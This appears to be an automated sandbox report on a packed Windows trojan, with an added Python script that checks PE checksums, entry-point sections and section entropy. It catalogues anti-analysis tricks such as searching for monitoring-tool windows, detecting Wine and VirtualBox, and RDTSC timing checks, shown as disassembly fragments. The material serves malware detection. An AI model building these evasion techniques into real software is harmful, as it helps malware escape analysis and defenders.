Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADDE24
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A507A2
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 007B4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: smsoyiwh ZLIB complexity 0.9946275893392269
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\35M6IBBY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1814528 > 1048576
Source: file.exe | Static PE information: Raw size of smsoyiwh is bigger than: 0x100000 < 0x1a1200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;smsoyiwh:EW;mwymltiy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;smsoyiwh:EW;mwymltiy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bdec2 should be: 0x1c57c3
Source: file.exe | Static PE information: section name: (empty or whitespace-only name)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or whitespace-only name)
Source: file.exe | Static PE information: section name: smsoyiwh
Source: file.exe | Static PE information: section name: mwymltiy
Source: file.exe | Static PE information: section name: .taggant
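Three of the static signatures in this section and the one above it (the checksum mismatch 0x1bdec2 vs 0x1c57c3, the entry point in .taggant rather than .text, and the near-incompressible smsoyiwh section with ZLIB complexity 0.9946) are cheap to reproduce from raw bytes without a sandbox. The script below is an added example written for this page, not Joe Sandbox code. It implements the Windows PE checksum arithmetic, takes the report's "ZLIB complexity" to be the compressed-to-raw size ratio (an assumption about how the sandbox computes it), flags section names outside an assumed list of linker defaults, and, because the analysed sample itself is not on the page, builds a constructed two-section PE32 image that reuses the name smsoyiwh so that the demonstration runs offline.

```python
import random
import struct
import zlib

# Assumed list of linker-default section names; anything else is flagged.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
HIGH_COMPLEXITY = 0.9   # assumed threshold; the report's packed section scores 0.9946


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Value Windows expects in IMAGE_OPTIONAL_HEADER.CheckSum: sum the file as
    32-bit words with end-around carry, skipping the CheckSum dword itself,
    fold to 16 bits and add the file length (imagehlp CheckSumMappedFile arithmetic)."""
    assert checksum_offset % 4 == 0
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def zlib_complexity(blob: bytes) -> float:
    """Compressed/raw size ratio; close to 1.0 means already compressed or encrypted."""
    return len(zlib.compress(blob, 9)) / len(blob) if blob else 0.0


def parse_pe(data: bytes) -> dict:
    """Header fields the triage needs (offsets are the same for PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw": data[rawptr:rawptr + rawsize]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_off": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def entry_section(sections: list, entry_rva: int):
    """Name of the section whose virtual range contains the entry point, else None."""
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["raw"])):
            return s["name"]
    return None


def triage(data: bytes) -> list:
    """Reproduce the report's checksum, entry-point, section-name and complexity signatures."""
    pe = parse_pe(data)
    findings = []
    real = pe_checksum(data, pe["checksum_off"])
    if pe["stored_checksum"] != real:
        findings.append("invalid checksum: stored 0x%x, should be 0x%x" % (pe["stored_checksum"], real))
    ep = entry_section(pe["sections"], pe["entry_rva"])
    if ep != ".text":
        findings.append("entry point lies outside .text: %r" % ep)
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append("non-standard section name: %r" % s["name"])
        c = zlib_complexity(s["raw"])
        if c > HIGH_COMPLEXITY:
            findings.append("section %r is incompressible (zlib complexity %.4f)" % (s["name"], c))
    return findings


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 image for the demo (not the analysed sample):
    entry point inside a pseudo-random section named like the report's
    smsoyiwh, and a CheckSum field left at zero."""
    rng = random.Random(1558834)            # fixed seed so the demo is reproducible
    packed = bytes(rng.randrange(256) for _ in range(0x400))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)   # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000) # AddressOfEntryPoint -> second section
    sections = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sections += struct.pack("<8sIIIIIIHHI", b"smsoyiwh", 0x400, 0x2000, 0x400, 0x400, 0, 0, 0, 0, 0xE0000020)
    header = (dos + coff + bytes(opt) + sections).ljust(0x200, b"\0")
    return header + b"\0" * 0x200 + packed


if __name__ == "__main__":
    for finding in triage(build_sample_pe()):
        print("-", finding)
```

On a real file call triage(open(path, "rb").read()); the checksum finding is informational on its own (many legitimate unsigned binaries ship with a zero or stale CheckSum), and it is the combination with an entry point in a non-code section and an incompressible section that mirrors the packer pattern this report describes.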
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9F8A9 push eax; mov dword ptr [esp], ecx (at 0_2_00B9F8C6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9F8A9 push 47E92CEEh; mov dword ptr [esp], eax (at 0_2_00BA02C1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A0D8 push ebp; mov dword ptr [esp], esi (at 0_2_00C0A168)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A0D8 push edx; mov dword ptr [esp], ebp (at 0_2_00C0A17E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF409F push esi; mov dword ptr [esp], ecx (at 0_2_00BF40C3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF409F push edi; mov dword ptr [esp], ebp (at 0_2_00BF411C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF5897 push 7BD77007h; mov dword ptr [esp], eax (at 0_2_00BF5952)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF5897 push 50B89249h; mov dword ptr [esp], edi (at 0_2_00BF596C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF5897 push edx; mov dword ptr [esp], eax (at 0_2_00BF59BE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0589A push 7AB4378Bh; mov dword ptr [esp], edi (at 0_2_00B058F2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0589A push ebp; mov dword ptr [esp], eax (at 0_2_00B0592B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0589A push 75EFEA89h; mov dword ptr [esp], edx (at 0_2_00B05973)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0589A push 1A8DAADDh; mov dword ptr [esp], edx (at 0_2_00B0599E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C248F1 push esi; mov dword ptr [esp], 53ECCE2Eh (at 0_2_00C24911)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C248F1 push 26104C27h; mov dword ptr [esp], ecx (at 0_2_00C24930)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1F089 push esi; mov dword ptr [esp], edi (at 0_2_00C1F11A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1F089 push 40EBDF52h; mov dword ptr [esp], ecx (at 0_2_00C1F14B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7C89E push edi; mov dword ptr [esp], ebx (at 0_2_00C7C8C2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7C89E push edi; mov dword ptr [esp], 7E77496Ch (at 0_2_00C7C8D2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA90F1 push eax; mov dword ptr [esp], esi (at 0_2_00AA9105)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA90F1 push 077383C2h; mov dword ptr [esp], ecx (at 0_2_00AA916A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA90F1 push 3E0A863Bh; mov dword ptr [esp], ecx (at 0_2_00AA9206)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA90F1 push 371047D7h; mov dword ptr [esp], ecx (at 0_2_00AA927C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1789A push ebx; mov dword ptr [esp], 665C7FEFh (at 0_2_00C1789E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1789A push edi; mov dword ptr [esp], esi (at 0_2_00C178CC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push eax; mov dword ptr [esp], 08F7F816h (at 0_2_00B6B186)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push edi; mov dword ptr [esp], eax (at 0_2_00B6B220)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push 7A4E02FBh; mov dword ptr [esp], ebp (at 0_2_00B6B2AF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push 4CFCFB13h; mov dword ptr [esp], ebp (at 0_2_00B6B473)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push ebx; mov dword ptr [esp], 6D77EFE7h (at 0_2_00B6B49A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE push esi; mov dword ptr [esp], ecx (at 0_2_00B6B4AE)
              Source: file.exeStatic PE information: section name: smsoyiwh entropy: 7.952862175295011

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_007D6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-26135
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE81 second address: BBBE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC21 second address: BBDC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC25 second address: BBDC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC33 second address: BBDC39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEBD7 second address: BBEBF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFB47 second address: BBFBCF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B48765F28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1D5Ch], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F0B48765F28h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jmp 00007F0B48765F2Ah 0x00000034 mov ebx, dword ptr [ebp+122D36BAh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F0B48765F28h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jmp 00007F0B48765F36h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F0B48765F28h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDD8C second address: BBDD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1B2A second address: BC1B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0B48765F30h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3148 second address: BC316B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnl 00007F0B48B8DEE6h 0x0000000d jmp 00007F0B48B8DEEBh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007F0B48B8DEE6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDD91 second address: BBDE4C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B48765F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0B48765F28h 0x00000012 pop edx 0x00000013 nop 0x00000014 jmp 00007F0B48765F36h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F0B48765F28h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a add edi, dword ptr [ebp+122D2E28h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 jmp 00007F0B48765F31h 0x0000004c mov eax, dword ptr [ebp+122D0B91h] 0x00000052 mov dword ptr [ebp+122D5907h], edx 0x00000058 push FFFFFFFFh 0x0000005a movzx edi, bx 0x0000005d nop 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F0B48765F2Bh 0x00000065 jne 00007F0B48765F26h 0x0000006b popad 0x0000006c pop edx 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jnp 00007F0B48765F36h 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDE4C second address: BBDE56 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0B48B8DEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD00 second address: BBFD04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD04 second address: BBFD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0B48B8DEE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov bx, dx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 sub dword ptr [ebp+12450B21h], eax 0x00000039 mov eax, dword ptr [ebp+122D1149h] 0x0000003f add di, D700h 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F0B48B8DEE8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 cld 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 jmp 00007F0B48B8DEF7h 0x0000006a pop esi 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD8D second address: BBFD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC46A6 second address: BC46AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC46AD second address: BC46C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B48765F30h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6752 second address: BC6757 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC776F second address: BC7775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7775 second address: BC7779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC785E second address: BC7864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6ABA4 second address: B6ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6ABAA second address: B6ABCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F0B48765F43h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1845 second address: BD1850 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F20 second address: BD0F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F24 second address: BD0F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0B48B8DEF3h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F3F second address: BD0F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F43 second address: BD0F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F49 second address: BD0F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F0B48765F2Bh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jo 00007F0B48765F26h 0x00000012 popad 0x00000013 jno 00007F0B48765F34h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e jnp 00007F0B48765F26h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F87 second address: BD0F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD10FD second address: BD1107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1408 second address: BD140C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3061 second address: BD3065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3065 second address: BD3069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3069 second address: BD3075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3075 second address: BD3079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3079 second address: BD3081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD71ED second address: BD71F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02B second address: B5F03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F0B48765F32h 0x0000000b jc 00007F0B48765F26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8688 second address: BD868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD868D second address: BD86C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B48765F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F0B48765F30h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007F0B48765F30h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86C7 second address: BD86CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
